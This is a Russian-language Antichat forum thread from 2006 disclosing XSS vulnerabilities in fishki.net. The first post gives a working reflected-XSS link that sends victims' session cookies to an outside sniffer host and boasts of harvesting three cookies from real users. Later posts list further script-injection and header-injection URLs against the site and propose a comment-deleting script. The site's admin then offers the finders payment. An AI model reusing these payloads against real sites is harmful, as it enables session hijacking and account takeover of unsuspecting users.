xss на www.fishki.net

Discussion in 'Уязвимости' started by podkashey, 25 Mar 2006.

  1. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Пассивная XSS в поиске на популярном сайте _www.fishki.net:
    если человек пройдет по ссылке _http://fishki.net/poisk.php?poisk=%27%3E%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Fantichat.ru%2Fcgi-bin%2Fs.jpg%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
    То оставит свои куки на сниффере. После подмены, можно писать комментарии под его ником. Больше никаких функций не будет по-моему. Поэтому ксс относительно бесполезная. Тема на форуме: "Глюк на фишки нет" с этой ссылкой пролежала 5 минут и принесла 3 куков.
     
    #1 podkashey, 25 Mar 2006
    5 people like this.
  2. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Обнаружил, что можно удалять комментарии, если вставить в куки че-нить дельное. Например ed36464a5c3b8f90fcd5d950a66197f4. Можно например написать скрипт, который будет лазить по топискам и тереть все комментарии, кроме нужных (реклама например)...
    Если кто-нить будет реализовывать, накиньте денег на пивко... ;)
     
    #2 podkashey, 26 Mar 2006
  3. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    podkashey, молодец)
    Дельно нашёл..) на пивко не смогу накинуть, а вот репку)..
     
    #3 Rebz, 26 Mar 2006
  4. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    Вот еще: http://www.fishki.net/gresult.php?pollid='><script>alert('XSS')%3B</script>&voteid=1 ; http://www.fishki.net/comment.php?id='><script>alert('XSS')%3B</script> ; http://www.fishki.net/rgolos.php?pollid='><script>alert('XSS')%3B</script> ; http://www.fishki.net/gresult.php?pollid='><script>alert('XSS');</script> и еще установка своих cookies - http://www.fishki.net/votecomsend.php?pollid=some_url Set-Cookie:this_header=injected
     
    #4 Go0o$E, 29 Mar 2006
  5. HitMan

    HitMan New Member

    Joined:
    27 Mar 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    хотел бы выразить благодарность за создание этой темы и отдельно ресурсу античат.

    podkashey, как мы с тобой уже договорились - на пиво я тебе дам за проделанную работу, кинь мне в пм wmz, на этой неделе постараюсь перевести.

    Go0o$E, тебе тоже большое спасибо за найденные уязвимости, кинь также в пм свой wmz, постараюсь не обидеть.

    как получите wmz, отпишитесь в этой теме, пожалуйста, чтоб не думали, что я обманул.

    Спасибо.
     
    #5 HitMan, 29 Mar 2006
  6. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    2HitMan
    Ты админыч фишки?
     
    _________________________
    #6 censored!, 29 Mar 2006
  7. HitMan

    HitMan New Member

    Joined:
    27 Mar 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    censored!, да.
    не с самого начала, двиг начат не мной, там внизу подписано чей

    From m0nzt3r: сорри не удержался, просто твой проект нравится мне.Так держать!
     
    #7 HitMan, 29 Mar 2006
    Last edited by a moderator: 9 May 2006
  8. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    http://xshop.fishki.net/my/orders/get_by_code.php?code=<script>alert(/xss_by_toxa/);alert(document.cookie)</script>&check=
     
    _________________________
    #8 +toxa+, 9 May 2006
  9. HitMan

    HitMan New Member

    Joined:
    27 Mar 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    +toxa+, это http://www.sexvideogid.ru/ - их партнёрка.
    я там не при чём :(
    если хочешь - могу им передать.
    скажешь нет - промолчу
     
    #9 HitMan, 9 May 2006
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.